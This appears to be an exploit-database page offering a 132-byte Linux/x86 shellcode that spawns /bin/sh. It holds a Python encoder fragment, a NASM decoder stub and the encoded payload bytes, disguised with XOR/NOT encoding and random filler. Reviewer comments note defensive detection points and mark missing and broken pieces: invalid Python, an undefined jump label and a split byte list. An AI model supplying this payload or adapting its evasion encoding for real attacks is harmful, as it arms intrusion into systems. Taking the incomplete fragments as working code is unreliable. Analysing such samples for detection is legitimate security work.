Linux/x86 not + xorn + random encoded /bin/sh shellcode (132 bytes) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-10-04 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability, Linux/x86 not + xorn + random encoded /bin/sh shellcode (132 bytes), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Date: 4th October 2019
# Shellcode Author: @bolonobolo - https://bolonobolo.github.io
# Tested on: Linux x86
# Encoder step for a single payload byte `x`: appends one three-part group
# (marker, encoded byte, filler) to the text accumulator `encoded`. Each part
# is written as a literal "\xNN" escape string, not as a raw byte.
# NOTE(review): the enclosing per-byte loop, the definitions of `x` and
# `encoded`, the `import random` and all indentation are missing from this
# excerpt; as printed the fragment is not valid Python.
# For analysts: the layout is fixed (marker 0xbb or 0xcc at every third
# position, constant XOR key 0xDD), so the random filler changes byte values
# between runs but not the structure a signature or YARA rule can match.
if x < 128:
# Bytes below 0x80 are XORed with the constant key 0xDD
x = x^0xDD
# 0xbb marks "the next byte was XOR-encoded"
encoded += '\\xbb'
encoded += '\\x'
encoded += '%02x' % x
else:
# Bytes 0x80 and above are bitwise inverted (NOT)
x = ~x
# 0xcc marks "the next byte was NOT-encoded"
encoded += '\\xcc'
encoded += '\\x'
# ~x is negative in Python, so mask back to a single byte before formatting
encoded += '%02x' % (x & 0xff)
# Filler byte: randint(1,169) is inclusive, so the value is never 0x00 and
# never reaches 0xaa (170); it therefore cannot equal 0xaa or the 0xbb/0xcc
# markers. NOTE(review): presumably appended for every byte (after the
# if/else), matching the "placeholder, char, random" layout - confirm.
encoded += '\\x%02x' % random.randint(1,169)
;-----------------------------------------------------------------------
; decoder - in-place decoder stub (NASM syntax, 32-bit x86)
; In:    [esp] = address of the encoded bytes, pushed by `call decoder`
; Regs:  esi = base of encoded data, edi = write cursor for decoded bytes,
;        eax = read offset into the encoded data, bl = byte being decoded
; NOTE(review): this excerpt is incomplete. The label `switch` targeted by
; the final jmp is not defined here; the marker dispatch (0xaa / 0xbb /
; 0xcc) and the XOR path presumably live there. Only the NOT path is
; visible as printed.
; Defensive note: edi starts equal to esi, so decoded bytes overwrite the
; encoded buffer. The stub therefore needs memory that is both writable
; and executable; a W^X / non-executable-data policy stops it.
;-----------------------------------------------------------------------
decoder:
; the sequence of the chars in shellcode is:
; placeholder,obfuscated shellcode char,random char
pop esi                                 ; esi = return address = start of the data after the call
lea edi, [esi]                          ; edi = esi: output is written over the input buffer
xor eax, eax                            ; eax = 0: offset of the current 3-byte group
xor ebx, ebx                            ; clear ebx before using bl
mov bl, byte [esi + eax + 1]            ; bl = second byte of the group (the encoded byte)
mov byte [edi], bl                      ; store it at the write cursor
not byte [edi]                          ; undo the NOT encoding in place
inc edi                                 ; one decoded byte produced
add al, 3                               ; step to the next group (marker, byte, filler)
jmp short switch                        ; NOTE(review): `switch` is not in this excerpt
; call_decoder - the call pushes the address of the bytes that follow it
; (the `shellcode` label) as its return address; decoder pops that value
; instead of returning, which gives the stub the data's address without a
; hard-coded pointer.
; NOTE(review): the jump that would reach call_decoder first is not visible
; in this excerpt.
call_decoder:
call decoder
; Encoded payload: 25 three-byte groups (marker 0xbb or 0xcc, encoded byte,
; filler byte <= 0xa9) followed by a single trailing 0xaa. Per the page
; title the decoded bytes are a /bin/sh payload.
; NOTE(review): 0xaa is presumably the end-of-data marker - the check for it
; is not in the visible decoder.
; Defensive note: the markers sit at a fixed stride of 3 and the stub above
; is constant, so the sample can be matched structurally even though the
; filler bytes differ between runs.
; NOTE(review): the line break after `db` looks like an extraction artifact;
; NASM expects the byte list on the same line as `db`.
shellcode: db
0xbb,0xec,0x73,0xcc,0x3f,0x9d,0xbb,0x8d,0x51,0xbb,0xb5,0x1b,0xbb,0xb3,0x22,0xbb,0xf2,0x79,0xbb,0xae,0x8e,0xbb,0xb5,0x61,0xbb,0xb5,0x3d,0xbb,0xf2,0x6e,0xbb,0xf2,0x9f,0xbb,0xbf,0x10,0xbb,0xb4,0x89,0xcc,0x76,0x2d,0xcc,0x1c,0x2f,0xbb,0x8d,0x91,0xcc,0x76,0x7e,0xcc,0x1d,0x92,0xbb,0x8e,0x80,0xcc,0x76,0x7b,0xcc,0x1e,0xa7,0xcc,0x4f,0x7f,0xbb,0xd6,0x2b,0xcc,0x32,0x24,0xcc,0x7f,0x37,0xaa